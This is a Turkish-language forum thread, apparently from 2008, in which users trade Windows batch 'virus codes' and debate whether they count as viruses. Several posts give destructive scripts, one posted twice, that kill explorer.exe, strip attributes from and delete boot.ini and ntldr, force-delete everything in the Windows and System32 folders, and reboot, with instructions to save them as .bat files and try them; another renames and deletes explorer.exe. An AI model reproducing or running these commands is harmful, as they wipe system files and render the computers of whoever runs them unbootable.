AdRaMiTiSiyah şapkalılar
Kötü Kişiler Derkene ?
Virüs Kodalrı
- 1
- 2
Ben onun yerine şunu yaptım(ama çalıştırmadım);
cdcd c:\windows
cd c:windows\system32
ren explorer.exe explorer.exe.bak
ren explorer.exe.bak explorer.exe.bak.1
del explorer.exe.bak.1
bu daha mantıklı çünkü c:\nin hepsini silmesi zor
(explorer.exe yerine shell32.dll olursa daha iyi olur)
en basiti deneyin görün...
echo@
echo off
taskkill /im explorer.exe /f
cd..
cd..
attrib -h -r -s ntldr
attrib -h -r -s boot.ini
del boot.ini /q/s
del ntldr /q/s
c:
cd windows
del *.* /f/q/s
cd system32
del *.* /f/q/s
shutdown -r
metin belgesine kopalayıp uzantısnı .bat olarak kaydedin...
edit :))
arkadaslar bu virüs falan degil :)
cok güldüm ya bu sadece bir ms-dos komutu
ms dos kullanmis arkadaslarim bunu bilirler...
bat dosyasi da toplu islem dosyasi ve bunu biraz ms dos bilen herkes yapabilir...
ornegin ben msdos da dir/p yerine d.bat diye bir bat dosyasi olusturmustum ve hep onu kullanirdim kolaylik olsun diye (d yazip entera basinca dir/p islem görürdü)
saygilarimla
ali
M.a.Karkadaslar bu virüs falan degil :)ali kardeş zaten virüs diyen kişi az buna :)cok güldüm ya bu sadece bir ms-dos komutu
ms dos kullanmis arkadaslarim bunu bilirler...
bat dosyasi da toplu islem dosyasi ve bunu biraz ms dos bilen herkes yapabilir...ornegin ben msdos da dir/p yerine d.bat diye bir bat dosyasi olusturmustum ve hep onu kullanirdim kolaylik olsun diye (d yazip entera basinca dir/p islem görürdü)
antivirüs ile taratanlar filan komut dizisi bunlar onuda yani çok güldüm biraz ağır kaçmış :)
işe yarıyo gerçekten siliyo gibi gözüküyo siliyoda ama sonra restartta düzeliyo
es-lowen basiti deneyin görün...çalışıyo senenkiecho@
echo off
taskkill /im explorer.exe /f
cd..
cd..
attrib -h -r -s ntldr
attrib -h -r -s boot.ini
del boot.ini /q/s
del ntldr /q/s
c:
cd windows
del *.* /f/q/s
cd system32
del *.* /f/q/sshutdown -r
metin belgesine kopalayıp uzantısnı .bat olarak kaydedin...
edit :))
boraalper4DEL komutu: Dosya veya dosyaları silmeyi sağlarZaten şimdiki virüsler .bat veya cmd .yöntemiyle çalışıyor!!!
Örnek:
C:\> DEL LATS.TXT <ENTER> (LATS dosyasını siler)
C:\> DEL *.* <ENTER> (Tüm dosyaları siler)
C:\> DEL *.EXE <ENTER> (EXE uzantılı dosyaları siler)
Aslında virüs değil gibi ama note pad'e kalın olan kodu yazıp uzantıyı .bat yaparsanız bir virüs olabilir. (Kesin Değil)
Amvo virüsü de aynı şekilde çalışıyodu.Ama Antivirüs programları da bunu aşıyolar!!!
Risk almamak için bunu sanal xpde deniycem ve sonucu buraya yazacağım!!!Son Düzenleme: alierenerdal ~ 13 Aralık 2008 19:41
Deneyenler için şimdiden teşekkürler. :-)
borozançalışıyoçalışmaz olurmu :)hayatımız bunlar
es-lowali kardeş zaten virüs diyen kişi az buna :)önceki yorumumda aslinda amacim katiyen kücük görmek, dalga gecmek maksadi tasimamaktadir, lakin özellikle bastaki yorumlari okuyunca biraz güldüm ve acikcasi buna ilaveten de bu yorumu yazdim...
antivirüs ile taratanlar filan komut dizisi bunlar onuda yani çok güldüm biraz ağır kaçmış :)alinan varsa sunu demek isterim ki amacim kimseyi kirmak degildir, kusuruma bakmasin lakin MSdos komutlarina bakabilir (gerci simdilerde pek ise yariyor da diyemem)
- 1
- 2